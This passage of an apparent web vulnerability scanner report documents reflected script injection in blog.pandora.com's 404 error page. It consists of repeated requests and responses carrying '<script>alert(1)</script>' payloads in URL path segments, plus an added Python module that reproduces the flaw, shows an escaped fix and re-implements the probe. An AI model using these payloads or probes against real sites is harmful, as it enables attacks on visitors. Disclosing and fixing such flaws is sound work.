Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/035e7ab<script>alert(1)</script>fa977886cf6/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d20c0<script>alert(1)</script>dd135c67fdd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorad20c0<script>alert(1)</script>dd135c67fdd/archives/2006/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:47 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorad20c0<script>alert(1)</script>dd135c67fdd/archives/2006/04/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ae903<script>alert(1)</script>470ea815a03 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesae903<script>alert(1)</script>470ea815a03/2006/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:53 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesae903<script>alert(1)</script>470ea815a03/2006/04/ was not found on this server.</p>
...[SNIP]...
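Read together, the entries in this run point at a single sink rather than four independent parameters per URL: whichever path segment carries the marker, it comes back in the same Apache-style 404 body with the whole decoded request path written between the <p> tags unencoded, so one fix to that error page closes every entry. Two things are worth checking before the finding is written up. First, the scanner sent the angle brackets raw in the request line; a browser following a crafted link percent-encodes them, so confirm that the percent-encoded form is decoded before it is echoed. Second, the safe outcome is the path reflected with entities encoded, not the path removed, since the message is still meant to show it. The following Python is an added example, not code from the scan report, from blog.pandora.com or from Apache: it reproduces the echo, shows the hardened form, and re-implements the random-prefix/suffix marker check the scanner used, with both raw and percent-encoded delivery. The template string, the function names and the marker lengths are assumptions made for this demonstration.

```python
# Added example: reproduces the 404 path echo from the report, shows the
# hardened version, and re-implements the scanner's marker-based check.
# NOT_FOUND_TEMPLATE mirrors the 404 body in the report; every function
# name and the marker lengths are assumptions made for this demonstration,
# not code from the target or from Apache.
import html
import secrets
from typing import Tuple
from urllib.parse import quote, unquote

NOT_FOUND_TEMPLATE = (
    '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n'
    "<html><head>\n<title>404 Not Found</title>\n</head><body>\n"
    "<h1>Not Found</h1>\n"
    "<p>The requested URL {url} was not found on this server.</p>\n"
    "</body></html>\n"
)

SCRIPT_CORE = "<script>alert(1)</script>"


def vulnerable_not_found(raw_path: str) -> str:
    """Percent-decode the request path and write it straight into the HTML.

    This is the behaviour the report documents: whatever a path segment
    contains lands between <p> tags and is parsed as markup.
    """
    return NOT_FOUND_TEMPLATE.format(url=unquote(raw_path))


def hardened_not_found(raw_path: str) -> str:
    """Same page, but the decoded path is entity-encoded for the
    'plain text between tags' context before it is written out."""
    return NOT_FOUND_TEMPLATE.format(url=html.escape(unquote(raw_path), quote=True))


def make_marker(prefix_len: int = 5, suffix_len: int = 11) -> Tuple[str, str, str]:
    """Random prefix + script + random suffix, the shape of the report's payloads.

    The random halves make a hit attributable to this request rather than
    to text that already existed on the page.
    """
    prefix = secrets.token_hex(prefix_len)[:prefix_len]
    suffix = secrets.token_hex(suffix_len)[:suffix_len]
    return prefix, SCRIPT_CORE, suffix


def inject_into_segment(path: str, index: int, payload: str) -> str:
    """Append payload to the index-th (1-based) path segment, which is how
    the 'REST URL parameter N' probes in the report are built."""
    parts = path.strip("/").split("/")
    if not 1 <= index <= len(parts):
        raise ValueError("no such path segment")
    parts[index - 1] += payload
    return "/" + "/".join(parts) + "/"


def percent_encode(path: str) -> str:
    """What a browser actually sends for a link containing '<', '>' and parentheses."""
    return quote(path, safe="/")


def classify_reflection(body: str, prefix: str, core: str, suffix: str) -> str:
    """How the marker came back: verbatim (exploitable), entity-encoded
    (the safe outcome), or not at all."""
    if (prefix + core + suffix) in body:
        return "reflected unmodified"
    if (prefix + html.escape(core, quote=True) + suffix) in body:
        return "reflected, HTML-encoded"
    return "not reflected"


def probe(handler, base_path: str, segment: int) -> str:
    """One scanner-style probe of a single path segment, delivered the way a
    browser would deliver it (percent-encoded), classified by its echo."""
    prefix, core, suffix = make_marker()
    path = inject_into_segment(base_path, segment, prefix + core + suffix)
    return classify_reflection(handler(percent_encode(path)), prefix, core, suffix)


if __name__ == "__main__":
    base = "/pandora/archives/2006/04/"
    for seg in range(1, 5):
        print(seg, probe(vulnerable_not_found, base, seg),
              "|", probe(hardened_not_found, base, seg))
```

Running the module probes all four segments of the archive path against both handlers; the vulnerable one reports every segment as reflected unmodified, the hardened one reports every segment as reflected but HTML-encoded, which is the result a retest after the fix should show.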
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7efd0<script>alert(1)</script>a5036d92cf6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20067efd0<script>alert(1)</script>a5036d92cf6/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20067efd0<script>alert(1)</script>a5036d92cf6/04/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8bc6a<script>alert(1)</script>12e73a2793e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/048bc6a<script>alert(1)</script>12e73a2793e/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:02 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/048bc6a<script>alert(1)</script>12e73a2793e/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cd43a<script>alert(1)</script>e86a08eb842 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoracd43a<script>alert(1)</script>e86a08eb842/archives/2006/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoracd43a<script>alert(1)</script>e86a08eb842/archives/2006/05/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 47765<script>alert(1)</script>7bc942491d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives47765<script>alert(1)</script>7bc942491d7/2006/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives47765<script>alert(1)</script>7bc942491d7/2006/05/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8006b<script>alert(1)</script>683adabb342 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20068006b<script>alert(1)</script>683adabb342/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20068006b<script>alert(1)</script>683adabb342/05/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload aa7d3<script>alert(1)</script>e86910f5065 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/05aa7d3<script>alert(1)</script>e86910f5065/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/05aa7d3<script>alert(1)</script>e86910f5065/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 33c8f<script>alert(1)</script>e3aabb416ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora33c8f<script>alert(1)</script>e3aabb416ad/archives/2006/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora33c8f<script>alert(1)</script>e3aabb416ad/archives/2006/06/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4f087<script>alert(1)</script>fe8192ca492 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives4f087<script>alert(1)</script>fe8192ca492/2006/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives4f087<script>alert(1)</script>fe8192ca492/2006/06/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3dbfc<script>alert(1)</script>cae8c69d562 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20063dbfc<script>alert(1)</script>cae8c69d562/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20063dbfc<script>alert(1)</script>cae8c69d562/06/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c455f<script>alert(1)</script>b6d36241d5f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/06c455f<script>alert(1)</script>b6d36241d5f/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:02 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/06c455f<script>alert(1)</script>b6d36241d5f/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fd617<script>alert(1)</script>7f88e7ca374 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorafd617<script>alert(1)</script>7f88e7ca374/archives/2006/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorafd617<script>alert(1)</script>7f88e7ca374/archives/2006/07/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec7f7<script>alert(1)</script>d0c5fa2a196 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesec7f7<script>alert(1)</script>d0c5fa2a196/2006/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesec7f7<script>alert(1)</script>d0c5fa2a196/2006/07/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 23e21<script>alert(1)</script>f8392586fa0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200623e21<script>alert(1)</script>f8392586fa0/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:21 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200623e21<script>alert(1)</script>f8392586fa0/07/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1665f<script>alert(1)</script>f197cc616af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/071665f<script>alert(1)</script>f197cc616af/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/071665f<script>alert(1)</script>f197cc616af/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1e163<script>alert(1)</script>746a263de0b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora1e163<script>alert(1)</script>746a263de0b/archives/2006/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
